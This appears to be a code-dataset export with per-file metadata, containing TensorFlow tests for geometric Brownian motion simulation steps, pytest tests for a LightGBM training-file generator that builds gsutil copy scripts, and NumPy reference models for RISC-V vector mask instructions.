with self.session() as session:
next_log_states_0_eval, next_log_states_1_eval = session.run(
(next_log_states_0, next_log_states_1))
self.assertEqual(next_log_states_0_eval.shape, (num_samples,))
self.assertEqual(next_log_states_1_eval.shape, (num_samples,))
# The step is a bijection w.r.t. dw_t, all terms should be different.
self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)
def test_gbm_log_euler_step_output_changes_with_key(self):
drift = 0.2
vol = 0.1
t = 0.0
dt = 0.01
num_samples = 8
key_0 = 1137
key_1 = 0
    log_states = tf.zeros([num_samples])
    next_log_states_0 = dynamics.gbm_log_euler_step(
        log_states, drift, vol, t, dt, key=key_0)
    next_log_states_1 = dynamics.gbm_log_euler_step(
        log_states, drift, vol, t, dt, key=key_1)
    with self.session() as session:
      next_log_states_0_eval, next_log_states_1_eval = session.run(
          (next_log_states_0, next_log_states_1))
    self.assertEqual(next_log_states_0_eval.shape, (num_samples,))
    self.assertEqual(next_log_states_1_eval.shape, (num_samples,))
    # The step is a bijection w.r.t. dw_t, so different keys must yield
    # different outputs.
    self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)

  def test_gbm_log_euler_step_nd_output_is_correct(self):
    drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
    vol_matrix = 0.2 * np.asarray(
        [[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
    dt = 0.01
    t = 0.0
    num_samples = 8
    num_dims = drift.shape[0]
    log_states = tf.zeros([num_samples, num_dims])
    eps_t = np.random.normal(size=[num_samples, num_dims]).astype(np.float32)
    next_log_states = dynamics.gbm_log_euler_step_nd(
        log_states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
    with self.session() as session:
      next_log_states_eval = session.run(next_log_states)
    self.assertEqual(next_log_states_eval.shape, (num_samples, num_dims))
    # Each sample should equal the analytic log-Euler update:
    # (drift - 0.5 * sum_j vol_ji^2) * dt + vol_matrix . (sqrt(dt) * eps).
    for i in range(num_samples):
      self.assertAllClose(
          next_log_states_eval[i],
          np.zeros([num_dims], dtype=np.float32) +
          (drift - 0.5 * np.sum(vol_matrix**2, axis=0)) * dt +
          np.matmul(vol_matrix, eps_t[i] * np.sqrt(dt)))

  def test_gbm_log_euler_step_nd_expects_static_shape(self):
    drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
    vol_matrix = 0.2 * np.asarray(
        [[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
    dt = 0.01
    t = 0.0
    num_dims = drift.shape[0]
    # The batch dimension is unknown at graph-construction time.
    log_states = tf.placeholder(dtype=tf.float32, shape=[None, num_dims])
    with self.assertRaises(ValueError):
      dynamics.gbm_log_euler_step_nd(log_states, drift, vol_matrix, t, dt)

  def test_gbm_log_euler_step_nd_is_deterministic(self):
    drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
    vol_matrix = 0.2 * np.asarray(
        [[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
    dt = 0.01
    t = 0.0
    num_samples = 8
    num_dims = drift.shape[0]
    key = 128
    log_states = tf.zeros([num_samples, num_dims])
    eps_t = contrib_stateless.stateless_random_normal(
        shape=[num_samples, num_dims], seed=[key, int(t / dt)])
    next_log_states = dynamics.gbm_log_euler_step_nd(
        log_states, drift, vol_matrix, t, dt, random_normal_op=lambda: eps_t)
    next_log_states_bis = dynamics.gbm_log_euler_step_nd(
        log_states, drift, vol_matrix, t, dt, key=key)
    with self.session() as session:
      next_log_states_eval, next_log_states_bis_eval = session.run(
          (next_log_states, next_log_states_bis))
    self.assertEqual(next_log_states_eval.shape, (num_samples, num_dims))
    self.assertEqual(next_log_states_bis_eval.shape, (num_samples, num_dims))
    self.assertAllClose(next_log_states_eval, next_log_states_bis_eval)

  def test_gbm_log_euler_step_nd_output_changes_with_t(self):
    drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
    vol_matrix = 0.2 * np.asarray(
        [[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
    dt = 0.01
    t_0 = 0.0
    num_samples = 8
    num_dims = drift.shape[0]
    t_1 = t_0 + dt
    log_states = tf.zeros([num_samples, num_dims])
    next_log_states_0 = dynamics.gbm_log_euler_step_nd(log_states, drift,
                                                       vol_matrix, t_0, dt)
    next_log_states_1 = dynamics.gbm_log_euler_step_nd(log_states, drift,
                                                       vol_matrix, t_1, dt)
    with self.session() as session:
      next_log_states_0_eval, next_log_states_1_eval = session.run(
          (next_log_states_0, next_log_states_1))
    self.assertEqual(next_log_states_0_eval.shape, (num_samples, num_dims))
    self.assertEqual(next_log_states_1_eval.shape, (num_samples, num_dims))
    # The step is a bijection w.r.t. dw_t, so different times (hence
    # different seeds) must yield different outputs.
    self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)

  def test_gbm_log_euler_step_nd_output_changes_with_key(self):
    drift = np.asarray([0.1, 0.3, -0.05], dtype=np.float32)
    vol_matrix = 0.2 * np.asarray(
        [[1.5, 0.2, 0.3], [0.2, 1.1, -0.1], [0.3, -0.1, 0.8]], dtype=np.float32)
    dt = 0.01
    t = 0.0
    num_samples = 8
    num_dims = drift.shape[0]
    key_0 = 50
    key_1 = 99
    log_states = tf.zeros([num_samples, num_dims])
    next_log_states_0 = dynamics.gbm_log_euler_step_nd(
        log_states, drift, vol_matrix, t, dt, key=key_0)
    next_log_states_1 = dynamics.gbm_log_euler_step_nd(
        log_states, drift, vol_matrix, t, dt, key=key_1)
    with self.session() as session:
      next_log_states_0_eval, next_log_states_1_eval = session.run(
          (next_log_states_0, next_log_states_1))
    self.assertEqual(next_log_states_0_eval.shape, (num_samples, num_dims))
    self.assertEqual(next_log_states_1_eval.shape, (num_samples, num_dims))
    # The step is a bijection w.r.t. dw_t, so different keys must yield
    # different outputs.
    self.assertAllDistinct(next_log_states_0_eval, next_log_states_1_eval)

  @tf.test.mock.patch.object(tf.random, 'stateless_normal')
  def test_random_normal(self, mock_stateless_random_normal):
    _ = dynamics.random_normal(shape=[3, 1], i=41 / 5, key=9)
    _, call_args = mock_stateless_random_normal.call_args
    # int(41 / 5) == 8, so the expected seed is [key, 8].
    assert_ops = [
        tf.assert_equal(tf.stack([9, 8]), call_args['seed']),
        tf.assert_equal([3, 1], call_args['shape'])
    ]
    with self.session() as sess:
      sess.run(assert_ops)


if __name__ == '__main__':
  tf.test.main()
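For reference, a minimal NumPy sketch of the one-dimensional log-Euler update the tests above exercise. The function name and signature are illustrative only (not the dynamics module's actual API); it assumes the standard log-space Euler discretization of geometric Brownian motion:

import numpy as np

def gbm_log_euler_step_sketch(log_states, drift, vol, dt, eps):
    # Standard log-space Euler step for geometric Brownian motion:
    #   log S_{t+dt} = log S_t + (drift - 0.5 * vol**2) * dt + vol * sqrt(dt) * eps,
    # where eps is one standard-normal draw per sample.
    return log_states + (drift - 0.5 * vol**2) * dt + vol * np.sqrt(dt) * eps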
| 35.630474 | 80 | 0.688945 | 6,170 | 39,051 | 3.996434 | 0.040681 | 0.089221 | 0.046232 | 0.052397 | 0.940303 | 0.925947 | 0.917065 | 0.908022 | 0.887825 | 0.877606 | 0 | 0.037133 | 0.206935 | 39,051 | 1,095 | 81 | 35.663014 | 0.759057 | 0.062764 | 0 | 0.761491 | 0 | 0 | 0.000903 | 0 | 0 | 0 | 0 | 0 | 0.152795 | 1 | 0.054658 | false | 0 | 0.008696 | 0 | 0.064596 | 0.001242 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
48e3364a00913ed743c1230b205d3fcedabc0cd2 | 8,754 | py | Python | tests/unit/frameworks/test_lightgbm.py | Jeffwan/fairing | c83ff8653a0744de6cfb65bffe584dc892a074da | ["Apache-2.0"] | 2 | 2019-06-27T18:17:06.000Z | 2019-08-14T12:29:32.000Z | tests/unit/frameworks/test_lightgbm.py | Jeffwan/fairing | c83ff8653a0744de6cfb65bffe584dc892a074da | ["Apache-2.0"] | null | null | null | tests/unit/frameworks/test_lightgbm.py | Jeffwan/fairing | c83ff8653a0744de6cfb65bffe584dc892a074da | ["Apache-2.0"] | null | null | null |
import pytest
from fairing.frameworks import lightgbm
import fairing
import posixpath
from fairing.constants import constants
from unittest.mock import patch

EXAMPLE_CONFIG = {
    'task': 'train',
    'boosting_type': 'gbdt',
    'objective': 'regression',
    "n_estimators": 10,
    "is_training_metric": True,
    "valid_data": "gs://lightgbm-test/regression.test",
    "train_data": "gs://lightgbm-test/regression.train",
    'verbose': 1,
    "model_output": "gs://lightgbm-test/model.txt"
}
EXMAPLE_CONFIG_FILE_NAME = "/config-file.conf"


def test_context_files_list():
    with patch('fairing.cloud.storage.GCSStorage.exists'):
        output_map = lightgbm.generate_context_files(
            EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
        actual = list(output_map.values())
        actual.sort()
        expected = [
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf.original'),
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf'),
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh'),
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'utils.py')
        ]
        expected.sort()
        assert expected == actual


def test_context_files_list_dist():
    with patch('fairing.cloud.storage.GCSStorage.exists'):
        output_map = lightgbm.generate_context_files(
            EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 2)
        actual = list(output_map.values())
        actual.sort()
        expected = [
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf.original'),
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf'),
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh'),
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'lightgbm_dist_training_init.py'),
            posixpath.join(constants.DEFAULT_DEST_PREFIX, 'utils.py')
        ]
        expected.sort()
        assert expected == actual


def test_entrypoint_content():
    with patch('fairing.cloud.storage.GCSStorage.exists'):
        output_map = lightgbm.generate_context_files(
            EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
        entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
        entrypoint_file = None
        for k, v in output_map.items():
            if v == entrypoint_file_in_docker:
                entrypoint_file = k
        actual = open(entrypoint_file, "r").read()
        expected = """#!/bin/sh
set -e
gsutil cp -r gs://lightgbm-test/regression.train.weight {0}/regression.train.weight
gsutil cp -r gs://lightgbm-test/regression.train {0}/regression.train
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
        print(actual)
        assert expected == actual


def test_final_config():
    with patch('fairing.cloud.storage.GCSStorage.exists'):
        output_map = lightgbm.generate_context_files(
            EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
        config_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'config.conf')
        config_file_local = None
        for k, v in output_map.items():
            if v == config_file_in_docker:
                config_file_local = k
        actual = open(config_file_local, "r").read()
        expected = """task=train
boosting_type=gbdt
objective=regression
n_estimators=10
is_training_metric=true
valid_data={0}/regression.test
train_data={0}/regression.train
verbose=1
model_output={0}/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
        print(actual)
        assert expected == actual


def test_input_file_not_found():
    with pytest.raises(RuntimeError) as excinfo:
        with patch('fairing.cloud.storage.GCSStorage.exists', new=lambda x, y: False):
            _ = lightgbm.generate_context_files(
                EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
    err_msg = str(excinfo.value)
    # "does't" (sic) mirrors the exact message raised by the library.
    assert "Remote file " in err_msg and "does't exist" in err_msg


def test_entrypoint_content_no_weight_file():
    with patch('fairing.cloud.storage.GCSStorage.exists',
               new=lambda bucket, path: not path.endswith(".weight")):
        output_map = lightgbm.generate_context_files(
            EXAMPLE_CONFIG, EXMAPLE_CONFIG_FILE_NAME, 1)
        entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
        entrypoint_file = None
        for k, v in output_map.items():
            if v == entrypoint_file_in_docker:
                entrypoint_file = k
        actual = open(entrypoint_file, "r").read()
        expected = """#!/bin/sh
set -e
gsutil cp -r gs://lightgbm-test/regression.train {0}/regression.train
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
        print(actual)
        assert expected == actual


def test_entrypoint_content_dist_data_parallel():
    config = EXAMPLE_CONFIG.copy()
    config["tree_learner"] = "data"
    config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
                                     "gs://lightgbm-test/regression.train2"])
    with patch('fairing.cloud.storage.GCSStorage.exists'):
        output_map = lightgbm.generate_context_files(
            config, EXMAPLE_CONFIG_FILE_NAME, 2)
        entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
        entrypoint_file = None
        for k, v in output_map.items():
            if v == entrypoint_file_in_docker:
                entrypoint_file = k
        actual = open(entrypoint_file, "r").read()
        expected = """#!/bin/sh
set -e
RANK=`python lightgbm_dist_training_init.py config.conf mlist.txt`
case $RANK in
0)
gsutil cp -r gs://lightgbm-test/regression.train1 /app/train_data
gsutil cp -r gs://lightgbm-test/regression.train1.weight /app/train_data.weight
;;
1)
gsutil cp -r gs://lightgbm-test/regression.train2 /app/train_data
gsutil cp -r gs://lightgbm-test/regression.train2.weight /app/train_data.weight
;;
esac
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
        print(actual)
        assert expected == actual


def test_entrypoint_content_dist_data_parallel_no_weight_files():
    config = EXAMPLE_CONFIG.copy()
    config["tree_learner"] = "data"
    config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
                                     "gs://lightgbm-test/regression.train2"])
    with patch('fairing.cloud.storage.GCSStorage.exists',
               new=lambda bucket, path: not path.endswith(".weight")):
        output_map = lightgbm.generate_context_files(
            config, EXMAPLE_CONFIG_FILE_NAME, 2)
        entrypoint_file_in_docker = posixpath.join(constants.DEFAULT_DEST_PREFIX, 'entrypoint.sh')
        entrypoint_file = None
        for k, v in output_map.items():
            if v == entrypoint_file_in_docker:
                entrypoint_file = k
        actual = open(entrypoint_file, "r").read()
        expected = """#!/bin/sh
set -e
RANK=`python lightgbm_dist_training_init.py config.conf mlist.txt`
case $RANK in
0)
gsutil cp -r gs://lightgbm-test/regression.train1 /app/train_data
;;
1)
gsutil cp -r gs://lightgbm-test/regression.train2 /app/train_data
;;
esac
gsutil cp -r gs://lightgbm-test/regression.test {0}/regression.test
echo 'All files are copied!'
lightgbm config={0}/config.conf
gsutil cp -r {0}/model.txt gs://lightgbm-test/model.txt
""".format(posixpath.realpath(constants.DEFAULT_DEST_PREFIX))
        print(actual)
        assert expected == actual


def test_dist_training_misconfigured_input_files():
    config = EXAMPLE_CONFIG.copy()
    config["tree_learner"] = "feature"
    config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
                                     "gs://lightgbm-test/regression.train2"])
    with pytest.raises(RuntimeError) as excinfo:
        lightgbm.generate_context_files(config, EXMAPLE_CONFIG_FILE_NAME, 2)
    assert "train_data has more than one file specified" in str(excinfo.value)


def test_dist_training_misconfigured_num_machines():
    config = EXAMPLE_CONFIG.copy()
    config["tree_learner"] = "data"
    config["train_data"] = ",".join(["gs://lightgbm-test/regression.train1",
                                     "gs://lightgbm-test/regression.train2"])
    with pytest.raises(RuntimeError) as excinfo:
        lightgbm.generate_context_files(config, EXMAPLE_CONFIG_FILE_NAME, 3)
    assert "field in the config should be equal to the num_machines=3 config value." in str(excinfo.value)
| 40.716279 | 112 | 0.711332 | 1,153 | 8,754 | 5.183868 | 0.129228 | 0.046846 | 0.065585 | 0.092354 | 0.891417 | 0.851598 | 0.833863 | 0.831019 | 0.818973 | 0.801573 | 0 | 0.00725 | 0.164953 | 8,754 | 215 | 113 | 40.716279 | 0.810397 | 0 | 0 | 0.708543 | 0 | 0.015075 | 0.360937 | 0.188007 | 0 | 0 | 0 | 0 | 0.050251 | 1 | 0.050251 | false | 0 | 0.030151 | 0 | 0.080402 | 0.025126 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
48e998851e93c20ed6c876fe4cb9d7d0e379eec1 | 3,579 | py | Python | rvpvp/isa/rvv/vmsxx_m.py | ultrafive/riscv-pvp | 843e38422c3d545352b955764927d5e7847e5453 | ["Unlicense"] | 5 | 2021-05-10T09:57:00.000Z | 2021-10-05T14:39:20.000Z | rvpvp/isa/rvv/vmsxx_m.py | ultrafive/riscv-pvp | 843e38422c3d545352b955764927d5e7847e5453 | ["Unlicense"] | null | null | null | rvpvp/isa/rvv/vmsxx_m.py | ultrafive/riscv-pvp | 843e38422c3d545352b955764927d5e7847e5453 | ["Unlicense"] | 1 | 2021-05-14T20:24:11.000Z | 2021-05-14T20:24:11.000Z |
from ...isa.inst import *
import numpy as np
import math


class Vmsof_m(Inst):
    name = 'vmsof.m'

    def golden(self):
        # Unpack the source bits (ANDed with the mask when one is given),
        # one byte per bit, truncated to the active vector length vl.
        if 'mask' in self:
            if 'vs2' in self:
                tmp = np.unpackbits(self['vs2'] & self['mask'], bitorder='little')[0: self['vl']]
            else:
                tmp = np.unpackbits(self['mask'] & self['mask'], bitorder='little')[0: self['vl']]
        else:
            tmp = np.unpackbits(self['vs2'], bitorder='little')[0: self['vl']]
        # Set-only-first: only the first set bit of the source survives.
        res = np.zeros(self['vl'], dtype=np.uint8)
        if np.size(np.where(tmp == 1)) > 0:
            firstOne = np.min(np.where(tmp == 1))
            res[firstOne] = 1
        if 'orign' in self:
            # Merge into the destination's original bits, leaving inactive
            # elements (mask == 0) unchanged.
            orign_bits = np.unpackbits(self['orign'], bitorder='little')
            if 'mask' in self:
                mask = np.unpackbits(self['mask'], bitorder='little')[0: self['vl']]
                res = np.where(mask == 1, res, orign_bits[0:self['vl']])
            orign_bits[0:self['vl']] = res[0:self['vl']]
            return np.packbits(orign_bits, bitorder='little')
        return np.packbits(res, bitorder='little')


class Vmsbf_m(Inst):
    name = 'vmsbf.m'

    def golden(self):
        if 'mask' in self:
            if 'vs2' in self:
                tmp = np.unpackbits(self['vs2'] & self['mask'], bitorder='little')[0: self['vl']]
            else:
                tmp = np.unpackbits(self['mask'] & self['mask'], bitorder='little')[0: self['vl']]
        else:
            tmp = np.unpackbits(self['vs2'], bitorder='little')[0: self['vl']]
        # Set-before-first: ones strictly before the first set bit.
        res = np.ones(self['vl'], dtype=np.uint8)
        if np.size(np.where(tmp == 1)) > 0:
            firstOne = np.min(np.where(tmp == 1))
            for i in range(firstOne, self['vl']):
                res[i] = 0
        if 'mask' in self:
            mask = np.unpackbits(self['mask'], bitorder='little')[0:self['vl']]
            res = np.where(mask == 1, res, 0)
        if 'orign' in self:
            orign_bits = np.unpackbits(self['orign'], bitorder='little')
            if 'mask' in self:
                mask = np.unpackbits(self['mask'], bitorder='little')[0: self['vl']]
                res = np.where(mask == 1, res, orign_bits[0:self['vl']])
            orign_bits[0:self['vl']] = res[0:self['vl']]
            return np.packbits(orign_bits, bitorder='little')
        return np.packbits(res, bitorder='little')


class Vmsif_m(Inst):
    name = 'vmsif.m'

    def golden(self):
        if 'mask' in self:
            if 'vs2' in self:
                tmp = np.unpackbits(self['vs2'] & self['mask'], bitorder='little')[0: self['vl']]
            else:
                tmp = np.unpackbits(self['mask'] & self['mask'], bitorder='little')[0: self['vl']]
        else:
            tmp = np.unpackbits(self['vs2'], bitorder='little')[0: self['vl']]
        # Set-including-first: ones up to and including the first set bit.
        res = np.ones(self['vl'], dtype=np.uint8)
        if np.size(np.where(tmp == 1)) > 0:
            firstOne = np.min(np.where(tmp == 1))
            for i in range(firstOne + 1, self['vl']):
                res[i] = 0
        if 'mask' in self:
            mask = np.unpackbits(self['mask'], bitorder='little')[0:self['vl']]
            res = np.where(mask == 1, res, 0)
        if 'orign' in self:
            orign_bits = np.unpackbits(self['orign'], bitorder='little')
            if 'mask' in self:
                mask = np.unpackbits(self['mask'], bitorder='little')[0: self['vl']]
                res = np.where(mask == 1, res, orign_bits[0:self['vl']])
            orign_bits[0:self['vl']] = res[0:self['vl']]
            return np.packbits(orign_bits, bitorder='little')
        return np.packbits(res, bitorder='little')
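A quick NumPy check of the three mask-set semantics modeled above (vmsof.m keeps only the first set bit, vmsbf.m sets everything strictly before it, vmsif.m everything up to and including it); the input vector is an arbitrary illustrative example, not taken from the suite:

import numpy as np

tmp = np.array([0, 0, 1, 0, 1], dtype=np.uint8)    # unpacked source bits
first = np.min(np.where(tmp == 1))                 # index of the first set bit
vmsof = np.zeros_like(tmp); vmsof[first] = 1       # vmsof.m -> [0 0 1 0 0]
vmsbf = np.ones_like(tmp);  vmsbf[first:] = 0      # vmsbf.m -> [1 1 0 0 0]
vmsif = np.ones_like(tmp);  vmsif[first + 1:] = 0  # vmsif.m -> [1 1 1 0 0]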
| 41.137931 | 96 | 0.525007 | 484 | 3,579 | 3.85124 | 0.092975 | 0.090129 | 0.086373 | 0.142704 | 0.934549 | 0.934549 | 0.934549 | 0.934549 | 0.934549 | 0.934549 | 0 | 0.021501 | 0.285275 | 3,579 | 87 | 97 | 41.137931 | 0.707193 | 0 | 0 | 0.831169 | 0 | 0 | 0.100559 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038961 | false | 0 | 0.038961 | 0 | 0.233766 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |